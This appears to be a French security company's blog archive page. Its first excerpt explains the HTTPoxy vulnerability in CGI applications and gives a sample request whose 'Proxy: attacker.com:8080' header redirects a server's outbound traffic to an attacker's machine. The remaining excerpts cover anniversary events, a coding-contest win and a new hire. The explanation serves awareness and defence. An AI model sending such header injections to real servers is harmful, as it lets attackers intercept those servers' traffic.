Archives

HTTPoxy : Une vulnérabilité vieille de 15 ans refait surface!

Qu’est ce que HTTPoxy ? Il y a 15 ans, une vulnérabilité touchant le module libwww-perl était découverte et rapidement corrigée. Aujourd’hui, cette faille revient au gout du jour et semble impacter de nombreux produits. Cette vulnérabilité touche les applications Web CGI tels que celles développées en PHP, Python, Go ou Ruby. Protocole CGI – Meta variables Un serveur de type CGI prend toutes les entêtes HTTP personnalisées d’une requête, ajoute « HTTP_ » à son nom et l’enregistre en tant que variable d’environnement. Par exemple, la requête suivante envoyée à une application de type CGI : GET /index.html HTTP/1.0 Host: example.com Expert: Solutions Va engendrer la création de la variable d’environnement suivante : HTTP_Expert=”Solutions” Variable d’environnement HTTP_PROXY Sur un système Linux/Unix, une variable d’environnement spéciale permet à certains programmes usuels (ex : curl, wget, lynx, …) de connaitre et d’utiliser automatiquement le proxy de l’entreprise pour effectuer des requêtes vers Internet. Attaque et exploitation de HTTPoxy Un attaquant, via une requête similaire à celle-ci-dessous, peux écraser la valeur de la variable d’environnement HTTP_PROXY du serveur : GET /cgi-bin/script.pl HTTP/1.0 Host: victim.com Proxy: attacker.com:8080 Ceci aura comme effet de rediriger le trafic Internet du serveur Web vers une machine tiers contrôlée par l’attaquant. Par...

e-Xpert Solutions célèbre ses 15 ans de bon sens & d’expérience!

Pour passer dignement ce cap, nous avons organisé 4 événements pour vous remercier. Nous avons également prévu des cadeaux et un tirage au sort lors des deux croisières privées. Venez fêter cette occasion avec nous et réservez vos dates et les activités qui vous font plaisir. Programme Mercredi 31.08.16 – Genève Initiation au Golf & champagne : 14.30 – 18.30 Genève country club Bellevue GE Croisière privée (cocktail dînatoire) – 19.00 – 23.00 Bateau CGN « Henry Dunant » Embarquement : Genève Vieux Pâquis dès 19.00 – départ 19.15 Versoix dès 20.00 (pour les participants au golf Country club) Débarquement prévu: Versoix 22.00 & Genève Vieux Pâquis 23.00 Mercredi 14.09.16 – Lausanne Visite du musée olympique & apéritif : 14.30 – 17.30 Lausanne, Quai D’Ouchy Croisière privée (cocktail dînatoire) – 19.00 – 22.00 Bateau CGN « Lavaux » Embarquement : Lausanne-Ouchy dès 19.00 – départ 19.15 Débarquement prévu : Lausanne-Ouchy 22.00 Réservez vos...

e-Xpert remporte le concours de developpement F5 Devcentral

Après un mois de publication de code, le verdict est tombé. e-Xpert Solutions remporte le concours grâce à deux développements : * iControl REST Library for the Go Programming Language * A Catch from the Codeshare: Provisioning IOS for Exchange Active Sync L’annonce officielle est disponible ici : Codeshare Challenge: And the Winners...

Votre intégrateur renforce ses équipes techniques!

Dans le cadre du développement de nos activités de sécurité applicative et de développement, Michael Molho intègre les équipes d’e-Xpert en qualité d’Ingénieur Sécurité. Michael possède un excellent background en sécurité des applications, audits, pentests et développement. Voir son profil Linkedin.